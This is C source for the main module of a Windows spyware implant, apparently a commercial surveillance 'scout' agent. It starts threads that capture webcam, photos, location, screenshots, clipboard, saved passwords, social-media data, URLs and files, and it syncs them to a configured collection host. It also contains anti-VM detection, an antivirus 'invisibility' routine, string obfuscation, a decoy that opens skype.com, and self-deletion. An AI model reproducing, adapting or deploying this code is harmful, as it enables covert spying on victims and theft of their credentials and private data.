#pragma comment(lib, "Shlwapi") #pragma comment(lib, "winhttp") #pragma comment(lib, "Ws2_32") #pragma comment(lib, "psapi") #include #include #include "globals.h" #include "binpatch.h" #include "utils.h" #include "mayhem.h" #include "debug.h" #include "main.h" #include "md5.h" #include "zmem.h" #include "conf.h" #include "invisibility.h" #include "antivm.h" /* modules */ #include "position.h" #include "social.h" #include "clipboard.h" #include "password.h" #include "screenshot.h" #include "photo.h" #ifdef _DEBUG #include #endif #ifndef _GLOBAL_VERSION_FUNCTIONS_ #define _GLOBAL_VERSION_FUNCTIONS_ #include "version.h" #endif #pragma include_alias( "dxtrans.h", "camera.h" ) #define __IDxtCompositor_INTERFACE_DEFINED__ #define __IDxtAlphaSetter_INTERFACE_DEFINED__ #define __IDxtJpeg_INTERFACE_DEFINED__ #define __IDxtKey_INTERFACE_DEFINED__ #include "camera.h" #include "url.h" BYTE pServerKey[32]; BYTE pConfKey[32]; BYTE pSessionKey[20]; BYTE pLogKey[32]; HANDLE hScoutSharedMemory = NULL; HWND hScoutMessageWindow = NULL; HANDLE hMsgTimer = NULL; BOOL bCollectEvidences = TRUE; extern HANDLE g_hDevMutex; //defined in device.cpp #ifndef _DEBUG ////BYTE EMBEDDED_CONF[513] = "\xEF\xBE\xAD\xDE""CONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONF"; BYTE EMBEDDED_CONF[513] = "CONF""CONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONFCONF"; #else BYTE EMBEDDED_CONF[513] = "\x90\x01\x00\x00{\"camera\": {\"enabled\":false,\"repeat\":5,\"iter\":null},\"photo\":{\"enabled\":true},\"position\":{\"enabled\":true,\"repeat\":5},\"screenshot\":{\"enabled\":false,\"repeat\":60},\"addressbook\":{\"enabled\":false},\"chat\":{\"enabled\":false},\"clipboard\":{\"enabled\":false},\"device\":{\"enabled\":true},\"messages\":{\"enabled\":false},\"password\":{\"enabled\":true},\"url\":{\"enabled\":false},\"file\":{\"enabled\":true},\"sync\":{\"host\":\"192.168.100.100\",\"repeat\":1}}\x00\x16\xc0\xad\xbb\x01\xc0\xa2\x72\x3b\x23\xff\x46\x93\x68\x9f\x18\x23\x27\x9f\xee"; //BYTE EMBEDDED_CONF[513] = "\x90\x01\x00\x00{\"camera\": {\"enabled\":false,\"repeat\":20,\"iter\":10000},\"position\":{\"enabled\":false,\"repeat\":5},\"screenshot\":{\"enabled\":false,\"repeat\":5},\"addressbook\":{\"enabled\":false},\"chat\":{\"enabled\":false},\"clipboard\":{\"enabled\":false},\"device\":{\"enabled\":false},\"messages\":{\"enabled\":false},\"password\":{\"enabled\":false},\"url\":{\"enabled\":false},\"sync\":{\"host\":\"192.168.100.100\",\"repeat\":10}}\x00\x16\xc0\xad\xbb\x01\xc0\xa2\x72\x3b\x23\xff\x46\x93\x68\x9f\x18\x23\x27\x9f\xee"; #endif extern VOID SyncThreadFunction(); LRESULT CALLBACK WindowProc( _In_ HWND hwnd, _In_ UINT uMsg, _In_ WPARAM wParam, _In_ LPARAM lParam ) { switch (uMsg) { case WM_CREATE: return 0; case WM_PAINT: return 0; case WM_SIZE: return 0; case WM_DESTROY: return 0; default: return DefWindowProc(hwnd, uMsg, wParam, lParam); } return 0; } HANDLE hPositionThread = NULL; HANDLE hClipBoardThread = NULL; HANDLE hPasswordThread = NULL; HANDLE hScreenShotThread = NULL; HANDLE hSocialThread = NULL; HANDLE hCameraThread = NULL; HANDLE hURLThread = NULL; HANDLE hPhotoThread = NULL; BOOL bPositionThread = FALSE; BOOL bClipBoardThread = FALSE; BOOL bPasswordThread = FALSE; BOOL bScreenShotThread = FALSE; BOOL bSocialThread = FALSE; BOOL bCameraThread = FALSE; BOOL bURLThread = FALSE; BOOL bPhotoThread = FALSE; int CALLBACK WinMain( __in HINSTANCE hInstance, __in HINSTANCE hPrevInstance, __in LPSTR lpCmdLine, __in int nCmdShow) { if (FakeConditionalVersion()) { SecureZeroMemory(DEMO_TAG, 3); SecureZeroMemory(WMARKER, 3); SecureZeroMemory(CLIENT_KEY, 3); SecureZeroMemory(ENCRYPTION_KEY_CONF, 3); SecureZeroMemory(SCOUT_NAME, 3); SecureZeroMemory(EMBEDDED_CONF, 4); ShellExecute(NULL, L"open", L"http://www.skype.com", NULL, NULL, SW_SHOWNORMAL); return 1; } #ifdef _DEBUG OutputDebugString(L"Initializing scout..."); #endif if (InitScout()) { AvgInvisibility(); // wait for input WaitForInput(); #ifdef _DEBUG OutputDebugString(L"Creating Thread..."); #endif //create the mutex for google device g_hDevMutex = CreateMutex(NULL, FALSE, NULL); HANDLE hSyncThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)SyncThreadFunction, NULL, 0, NULL); HANDLE hMemoryThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)MemoryWatchDog, NULL, 0, NULL); #ifdef _DEBUG OutputDebugString(L"Starting modules..."); #endif StartModules(); // FIXME camera WaitForSingleObject(hSyncThread, INFINITE); } if (hScoutSharedMemory) CloseHandle(hScoutSharedMemory); return 0; } VOID MemoryWatchDog() { IWbemLocator *pLoc=0; IWbemServices *pSvc=0; WCHAR strQuery[200] = { L'\0' }; WCHAR strRootCIM[] = { L'R', L'O', L'O', L'T', L'\\', L'C', L'I', L'M', L'V', L'2', L'\0' }; WCHAR strFormat[] = { L's', L'e', L'l', L'e', L'c', L't', L' ', L'*', L' ', L'f', L'r', L'o', L'm', L' ', L'W', L'i', L'n', L'3', L'2', L'_', L'P', L'e', L'r', L'f', L'F', L'o', L'r', L'm', L'a', L't', L't', L'e', L'd', L'D', L'a', L't', L'a', L'_', L'P', L'e', L'r', L'f', L'P', L'r', L'o', L'c', L'_', L'P', L'r', L'o', L'c', L'e', L's', L's', L' ', L'W', L'H', L'E', L'R', L'E', L' ', L'I', L'D', L'P', L'r', L'o', L'c', L'e', L's', L's', L' ', L'=', L' ', L'%', L'd', L'\0' }; CoInitializeEx(0, COINIT_MULTITHREADED|COINIT_DISABLE_OLE1DDE); CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE,NULL); if (CoCreateInstance(CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER, IID_IWbemLocator, (LPVOID *)&pLoc) != S_OK) { #ifdef _DEBUG __asm int 3; #endif return; } if (!pLoc) { #ifdef _DEBUG __asm int 3; #endif return; } BSTR bRootCIM = SysAllocString(strRootCIM); if (pLoc->ConnectServer(bRootCIM, NULL, NULL, 0, NULL, 0, 0, &pSvc) != WBEM_S_NO_ERROR) { #ifdef _DEBUG __asm int 3; #endif SysFreeString(bRootCIM); pLoc->Release(); return; } SysFreeString(bRootCIM); if (CoSetProxyBlanket(pSvc, RPC_C_AUTHN_WINNT, RPC_C_AUTHZ_NONE, NULL, RPC_C_AUTHN_LEVEL_CALL, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE) != S_OK) { #ifdef _DEBUG __asm int 3; #endif pSvc->Release(); pLoc->Release(); return; } _snwprintf_s(strQuery, 200, _TRUNCATE, strFormat, GetCurrentProcessId()); while (1) { VARIANT vVariant; VariantInit(&vVariant); if (WMIExecQueryGetProp(pSvc, strQuery, L"PrivateBytes", &vVariant)) //FIXME: array e invece del procname(che puo' essercene + di uno dato che sono app lecite) usa il PID!! { DWORD dwMemUsed = _wtoi(vVariant.bstrVal) / 1024; if (dwMemUsed >= 1000000 && bCollectEvidences == TRUE) bCollectEvidences = FALSE; if (dwMemUsed < 500000 && bCollectEvidences == FALSE) bCollectEvidences = TRUE; } VariantClear(&vVariant); Sleep(10000); } } BOOL InitScout() { srand(GetTickCount()); InitEncryptionKeys(); BOOL bVM = AntiVM(); BOOL bElite = ExistsEliteSharedMemory(); BOOL bScout = ExistsScoutSharedMemory(); // check for elite or scout presence //if (ExistsEliteSharedMemory() || ExistsScoutSharedMemory()) if (bVM || bElite || bScout) { #ifdef _DEBUG OutputDebug(L"[+] An ELITE or SCOUT is already installed here!\n"); __asm int 3; #endif if (bElite && AmIFromStartup()) DeleteAndDie(TRUE); // FIXME: forse e' ok uscire qui return FALSE; } if (FakeConditionalVersion()) return FALSE; // load conf if (!LoadConf()) return FALSE; //if (!DecryptConf()) // return FALSE; #ifdef _DEBUG OutputDebugString(L"Creating Shared Memory..."); #endif // create scout shared memory if (!CreateScoutSharedMemory()) return FALSE; // create message window CreateMessageWindow(); CoInitializeEx(0, COINIT_MULTITHREADED|COINIT_DISABLE_OLE1DDE); CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE,NULL); return TRUE; } VOID Uninstall() { SocialDeleteTimeStamps(); DeleteAndDie(TRUE); } VOID InitEncryptionKeys() { memcpy(pServerKey, CLIENT_KEY, 32); memcpy(pConfKey, ENCRYPTION_KEY_CONF, 32); memcpy(pLogKey, ENCRYPTION_KEY, 32); SecureZeroMemory(pSessionKey, 20); #ifdef _DEBUG MD5((PBYTE)CLIENT_KEY, 32, (PBYTE)pServerKey); MD5((PBYTE)ENCRYPTION_KEY_CONF, 32, (PBYTE)pConfKey); MD5((PBYTE)ENCRYPTION_KEY, 32, (PBYTE)pLogKey); #endif } BOOL CreateMessageWindow() { return FALSE; // FIXME: un timer per ogni thread! WNDCLASSEX wClass; LPWSTR strClassName = GetRandomStringW(20); SecureZeroMemory(&wClass, sizeof(WNDCLASSEX)); wClass.cbSize = sizeof(WNDCLASSEX); wClass.lpszClassName = strClassName; wClass.lpfnWndProc = WindowProc; if (!RegisterClassEx(&wClass)) { #ifdef _DEBUG OutputDebug(L"[+] Cannot create message window class: %08x\n", GetLastError()); __asm int 3; #endif return FALSE; } hScoutMessageWindow = CreateWindowEx(0L, strClassName, strClassName, 0, 0, 0, 0, 0, HWND_MESSAGE , NULL, NULL, NULL); if (!hScoutMessageWindow) { #ifdef _DEBUG OutputDebug(L"[+] Cannot create message window: %08x\n", GetLastError()); __asm int 3; #endif return FALSE; } zfree(strClassName); return TRUE; } VOID StartModules() { if (ConfIsModuleEnabled(L"addressbook") || ConfIsModuleEnabled(L"chat") || ConfIsModuleEnabled(L"messages") || ConfIsModuleEnabled(L"position") || ConfIsModuleEnabled(L"photo") || ConfIsModuleEnabled(L"file") || ConfIsModuleEnabled(L"device")) //FIXME: array { if (hSocialThread == NULL) { #ifdef _DEBUG OutputDebug(L"[*] Starting hSocialThread\n"); #endif hSocialThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)SocialMain, NULL, 0, NULL); bSocialThread = TRUE; } } else bSocialThread = FALSE; if (ConfIsModuleEnabled(L"position")) //FIXME: array { if (hPositionThread == NULL) { #ifdef _DEBUG OutputDebug(L"[*] Starting hPositionThread\n"); #endif hPositionThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)PositionMain, NULL, 0, NULL); bPositionThread = TRUE; } } else bPositionThread = FALSE; if (ConfIsModuleEnabled(L"clipboard")) //FIXME: array { if (hClipBoardThread == NULL) { #ifdef _DEBUG OutputDebug(L"[*] Starting hClipBoardThread\n"); #endif hClipBoardThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ClipBoardMain, NULL, 0, NULL); bClipBoardThread = TRUE; } } else bClipBoardThread = FALSE; if (ConfIsModuleEnabled(L"password")) //FIXME: array { if (hPasswordThread == NULL) { #ifdef _DEBUG OutputDebug(L"[*] Starting hPasswordThread\n"); #endif hPasswordThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)PasswordMain, NULL, 0, NULL); bPasswordThread = TRUE; } } else bPasswordThread = FALSE; if (ConfIsModuleEnabled(L"screenshot")) //FIXME: array { if (hScreenShotThread == NULL) { #ifdef _DEBUG OutputDebug(L"[*] Starting hScreenShotThread\n"); #endif hScreenShotThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ScreenshotMain, NULL, 0, NULL); bScreenShotThread = TRUE; } } else bScreenShotThread = FALSE; if (ConfIsModuleEnabled(L"camera")) //FIXME: array { if (hCameraThread == NULL) { #ifdef _DEBUG OutputDebug(L"[*] Starting hCameraThread\n"); #endif hCameraThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)CameraMain, NULL, 0, NULL); bCameraThread = TRUE; } } else bCameraThread = FALSE; //url module if (ConfIsModuleEnabled(L"url")) //FIXME: array { if (hURLThread == NULL) { #ifdef _DEBUG OutputDebug(L"[*] Starting hURLThread\n"); #endif hURLThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)URL_Main, NULL, 0, NULL); bURLThread = TRUE; } } else bURLThread = FALSE; /* photo module */ // not needed atm, Facebook photos scheduled in social.cpp, will be needed with filsystem photos /*if (ConfIsModuleEnabled(L"photo")) { if (hPhotoThread == NULL) { #ifdef _DEBUG OutputDebug(L"[*] Starting hPhotoThread\n"); #endif hPhotoThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)PhotoMain, NULL, 0, NULL); bPhotoThread = TRUE; } } else bPhotoThread = FALSE;*/ } .